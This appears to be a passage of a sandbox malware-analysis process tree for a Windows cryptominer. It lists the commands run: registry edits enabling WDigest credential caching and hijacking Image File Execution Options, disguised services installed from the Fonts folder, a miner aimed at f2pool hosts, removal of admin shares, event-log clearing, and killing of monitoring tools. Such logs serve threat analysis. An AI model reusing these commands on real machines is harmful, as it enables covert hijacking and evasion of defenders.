C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
- Views/modifies file attributes
PID:3936

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2⤵
- Modifies registry key
PID:520

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:4248

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2⤵
PID:2088

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:4584

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2⤵
PID:3392

C:\Windows\SysWOW64\sc.exe
sc delete MetPipAtcivator
2⤵
- Launches sc.exe
PID:4184

C:\Windows\SysWOW64\sc.exe
sc stop SetPipAtcivator
2⤵
- Launches sc.exe
PID:1340

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMaims
2⤵
- Launches sc.exe
PID:4948

C:\Windows\SysWOW64\sc.exe
sc delete SetPipAtcivator
2⤵
- Launches sc.exe
PID:3808

C:\Windows\SysWOW64\sc.exe
sc stop MetPipAtcivator
2⤵
- Launches sc.exe
PID:1216

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMaims
2⤵
- Launches sc.exe
PID:1744

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMais
2⤵
- Launches sc.exe
PID:4764

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMais
2⤵
- Launches sc.exe
PID:2748

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im d1lhots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dl1hots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundlls.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
- Launches sc.exe
PID:1644

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
PID:4688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:3744

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
PID:232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:2348

C:\Windows\SysWOW64\net1.exe
net1 user mm123$ /del
2⤵
PID:5056

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
- Launches sc.exe
PID:3692

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
2⤵
- Executes dropped EXE
PID:3540

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2⤵
- Executes dropped EXE
PID:2664

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:1764

C:\Windows\SysWOW64\net.exe
net user mm123$ /del
2⤵
PID:2536

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\TEMP\csonhost.bat
2⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
3⤵
PID:4056

C:\Windows\SysWOW64\PING.EXE
ping 127.1 -n 5
3⤵
- Runs ping.exe
PID:1528

C:\Windows\SysWOW64\net.exe
net share iPC$ /delete
3⤵
PID:892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share iPC$ /delete
4⤵
PID:2540

C:\Windows\SysWOW64\net.exe
net share admin$ /delete
3⤵
PID:2268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share admin$ /delete
4⤵
PID:3020

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:3996

C:\Windows\SysWOW64\net.exe
net share c$ /delete
3⤵
PID:1668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share c$ /delete
4⤵
PID:472

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:5024

C:\Windows\SysWOW64\net.exe
net share d$ /delete
3⤵
PID:3812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share d$ /delete
4⤵
PID:1688

C:\Windows\SysWOW64\net.exe
net share e$ /delete
3⤵
PID:4284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share e$ /delete
4⤵
PID:976

C:\Windows\SysWOW64\net.exe
net share f$ /delete
3⤵
PID:4644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share f$ /delete
4⤵
PID:740

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
3⤵
PID:32

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
4⤵
PID:3208

C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED
3⤵
- Launches sc.exe
PID:824

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:3212

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:3004

C:\Windows\SysWOW64\sc.exe
sc stop Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:3160

C:\Windows\SysWOW64\sc.exe
sc delete Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:4240

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3132

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:1036

C:\Windows\SysWOW64\sc.exe
sc stop conhost
3⤵
- Launches sc.exe
PID:2980

C:\Windows\SysWOW64\sc.exe
sc delete conhost
3⤵
- Launches sc.exe
PID:776

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\conhost.exe /a
3⤵
- Modifies file permissions
PID:460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\conhost.exe /d everyone
3⤵
PID:676

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3⤵
- Sets file execution options in registry
PID:4352

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2724

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4812

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:1184

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4164

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4876

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:3544

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:4916

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:4108

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static del all
3⤵
PID:4656

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Aliyun
3⤵
PID:3744

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
3⤵
PID:232

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
3⤵
PID:3168

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3⤵
PID:2732

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3⤵
PID:2284

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3⤵
PID:1652

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3⤵
PID:4176

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3⤵
PID:976

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
3⤵
PID:1484

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
3⤵
PID:2920

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3⤵
PID:2292

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Aliyun assign=y
3⤵
PID:4764

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im lsars.exe /im lsacs.exe
3⤵
- Kills process with taskkill
PID:4840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im sqlservr.exe
3⤵
- Kills process with taskkill
PID:4976

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4576

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:4016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\sqlservr.exe /d everyone
3⤵
PID:2372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:332

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\csrss.exe
3⤵
- Sets file to hidden
PID:3044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\csrss.exe /d everyone
3⤵
PID:1332

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1856

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\lsass.exe
3⤵
- Sets file to hidden
PID:1388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2328

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\lsass.exe /d everyone
3⤵
PID:2980

C:\Windows\SysWOW64\sc.exe
sc stop "Application Layre Gateway Saervice"
3⤵
- Launches sc.exe
PID:5100

C:\Windows\SysWOW64\sc.exe
sc delete "Application Layre Gateway Saervice"
3⤵
- Launches sc.exe
PID:2888

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im boy.exe
3⤵
- Kills process with taskkill
PID:980

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\boy.exe
3⤵
- Sets file to hidden
PID:4360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2216

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\boy.exe /d everyone
3⤵
PID:4504

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im powershell.exe
3⤵
- Kills process with taskkill
PID:4812

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:8

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1428

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:412

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1764

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3556

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:2952

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:3744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4564

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:4236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3536

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3776

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1316

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3380

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:744

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\sethc.exe /a
3⤵
- Modifies file permissions
PID:1884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /g Administrators:f
3⤵
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2480

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Users:r
3⤵
PID:4712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
3⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d SERVICE
3⤵
PID:1364

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g system:r
3⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1232

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d "network service"
3⤵
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im wscript.exe
3⤵
- Kills process with taskkill
PID:3504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "windows powershell"
3⤵
- Clears Windows event logs
PID:4284

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "security"
3⤵
- Clears Windows event logs
PID:2896

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "system"
3⤵
- Clears Windows event logs
PID:1348

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:2164

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
PID:3904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user mm123$ /del
1⤵
PID:3132

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:3568

\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4072

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4720

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4844

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:564

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4092

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:4928

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:4840

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:4900

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:4920

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:3036

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:4328

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:236

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:116

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:2888

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:5100

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:3544

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:3676

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3404

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3172

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3380

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4364

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:4440

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:1044

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4560

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:704

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:1764

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:4996

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1296

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3764

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1116

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4820

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3392

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3808

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4848

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3516

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3672

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2472

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2784

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4244

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4596

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1232

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1864

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2992

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4900

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4952

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:824

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1816

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2352

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:976

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2900

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4828

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4372

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2264

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4892

C:\Windows\SysWOW64\attrib.exe
